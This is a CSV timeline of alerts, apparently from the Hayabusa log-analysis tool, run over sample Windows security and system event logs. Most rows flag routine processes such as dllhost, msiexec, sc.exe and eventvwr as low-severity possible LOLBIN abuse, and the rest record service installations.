0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.003 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.012 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.725 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:09.426 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:28.302 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:08:04.274 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:12:27.928 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:12:27.973 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:18:44.431 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:18:44.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.411 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.594 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.666 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 
17:03:48.398 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:48.398 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:48.588 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:52.725 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:52.725 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:08:59.282 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:09:30.260 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 
17:09:39.134 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:10:01.474 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:26:02.115 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 18:11:43.289 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:13:56.326 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.367 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.367 +00:00,IE10Win7,4688,low,Disc | 
LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.381 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.381 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:44:24.817 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:44:24.820 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:00:10.327 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:05:18.971 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:06:54.664 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:06:54.679 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:07:56.345 +00:00,IE10Win7,4688,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_builtin/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:12:07.898 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.543 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.691 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 
0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.743 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.761 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.771 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.809 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:10.436 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:27.488 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:27.704 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:47:09.257 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:47:09.370 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:01.641 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:09.250 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:18.846 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.301 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.355 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.379 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.416 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.426 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 
20:48:20.439 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.450 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.460 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:22.723 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:49:59.321 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:05.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:05.541 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:19.219 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:19.686 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:50:19.909 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
